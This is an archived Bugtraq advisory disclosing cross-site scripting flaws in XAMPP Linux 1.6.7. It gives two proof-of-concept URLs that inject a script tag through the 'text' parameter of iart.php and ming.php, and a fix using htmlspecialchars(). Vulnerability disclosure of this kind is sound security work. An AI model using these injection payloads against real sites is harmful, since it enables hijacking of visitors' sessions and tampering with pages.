Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

Xampp Linux 1.6.7 Multiple Cross Site Scripting Vulnerabilities
From: irancrash () gmail com
Date: Mon, 4 Aug 2008 08:13:04 -0600
----------------------------------------------------------------

Program : Xampp Linux 1.6.7

Type : Multiple Cross Site Scripting Vulnerabilities

Alert : Medium

----------------------------------------------------------------

Download From : http://puzzle.dl.sourceforge.net/sourceforge/xampp/xampp-linux-1.6.7.tar.gz

----------------------------------------------------------------

Discovered by : Khashayar Fereidani Or Dr.Crash

My Website : HTTP://FEREIDANI.IR

Team Website : Http://IRCRASH.COM

Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com

----------------------------------------------------------------

Cross Site Scripting Vulnerabilities :

Vulnerability work when register_globals set as on .

http://Example.com/xampp/iart.php?text=";>><<>>"''<script>alert(document.alert)</script>

http://Example.com/xampp/ming.php?text=";>><<>>"''<script>alert(document.alert)</script>

Solution : Remove xampp folder or filter text variable with htmlspecialchars() function ....

----------------------------------------------------------------

                        Tnx : God

                     HTTP://IRCRASH.COM

----------------------------------------------------------------

  By Date           By Thread  

Current thread:
  • Xampp Linux 1.6.7 Multiple Cross Site Scripting Vulnerabilities irancrash (Aug 04)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]